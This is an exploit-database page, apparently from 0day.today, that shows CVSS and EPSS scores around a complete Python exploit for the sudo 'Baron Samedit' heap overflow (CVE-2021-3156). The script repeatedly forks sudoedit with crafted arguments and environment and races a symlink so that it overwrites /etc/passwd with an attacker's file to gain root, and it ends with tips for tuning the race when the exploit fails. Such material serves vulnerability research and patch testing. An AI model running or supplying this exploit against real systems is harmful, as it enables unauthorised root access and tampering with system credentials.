Lucene search

K
zdtWest Shepherd1337DAY-ID-35779
HistoryFeb 01, 2021 - 12:00 a.m.

Sudo 1.9.5p1 - (Baron Samedit) Heap-Based Buffer Overflow Privilege Escalation Exploit (1)

2021-02-0100:00:00
West Shepherd
0day.today
25

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.971 High

EPSS

Percentile

99.8%

# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)
# Exploit Author: West Shepherd
# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1.
# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31
# CVE : CVE-2021-3156
# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code.
# Sources:
# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
# (2) https://github.com/stong/CVE-2021-3156
# Requirements: Python3

#!/usr/bin/python3
import os
import pwd
import time
import sys
import argparse


class Exploit(object):
    username = ''
    size = 0
    data = ''

    def __init__(self, source, target, sleep):
        self.sleep = sleep
        self.source = source
        self.target = target

    @staticmethod
    def readFile(path):
        return open(path, 'r').read()

    @staticmethod
    def getUser():
        return pwd.getpwuid(os.getuid())[0]

    @staticmethod
    def getSize(path):
        return os.stat(path).st_size

    def main(self):
        self.username = self.getUser()
        self.data = self.readFile(self.source)
        self.size = self.getSize(self.target)
        environ = {
            '\n\n\n\n\n': '\n' + self.data,
            'SUDO_ASKPASS': '/bin/false',
            'LANG':
'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',
            'A': 'A' * 0xffff
        }
        for i in range(5000):
            directory =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i
            overflow =
'11111111111111111111111111111111111111111111111111111111%s' %
directory

            if os.path.exists(directory):
                sys.stdout.write('file exists %s\n' % directory)
                continue

            child = os.fork()
            os.environ = environ
            if child:
                sys.stdout.write('[+] parent %d \n' % i)
                sys.stdout.flush()
                time.sleep(self.sleep)
                if not os.path.exists(directory):
                    try:
                        os.mkdir(directory, 0o700)
                        os.symlink(self.target, '%s/%s' % (directory,
self.username))
                        os.waitpid(child, 0)
                    except:
                        continue
            else:
                sys.stdout.write('[+] child %d \n' % i)
                sys.stdout.flush()
                os.setpriority(os.PRIO_PROCESS, 0, 20)
                os.execve(
                    path='/usr/bin/sudoedit',
                    argv=[
                        '/usr/bin/sudoedit',
                        '-A',
                        '-s',
                        '\\',
                        overflow
                    ],
                    env=environ
                )
                sys.stdout.write('[!] execve failed\n')
                sys.stdout.flush()
                os.abort()
                break

            if self.size != self.getSize(self.target):
                sys.stdout.write('[*] success at iteration %d \n' % i)
                sys.stdout.flush()
                break
        sys.stdout.write("""
            \nConsider the following if the exploit fails:
            \n\t(1) If all directories are owned by root then sleep
needs to be decreased.
            \n\t(2) If they're all owned by you, then sleep needs
increased.
        """)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        add_help=True,
        description='* Sudo Privilege Escalation / Heap Overflow -
CVE-2021-3156 *'
    )
    try:
        parser.add_argument('-source', action='store', help='Path to
malicious "passwd" file to overwrite the target')
        parser.add_argument('-target', action='store', help='Target
file path to be overwritten (default: /etc/passwd)')
        parser.add_argument('-sleep', action='store', help='Sleep
setting for forked processes (default: 0.01 seconds')
        parser.set_defaults(target='/etc/passwd', sleep='0.01')

        options = parser.parse_args()
        if options.source is None:
            parser.print_help()
            sys.exit(1)

        exp = Exploit(
            source=options.source,
            target=options.target,
            sleep=float(options.sleep)
        )
        exp.main()
    except Exception as err:
        sys.stderr.write(str(err))

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.971 High

EPSS

Percentile

99.8%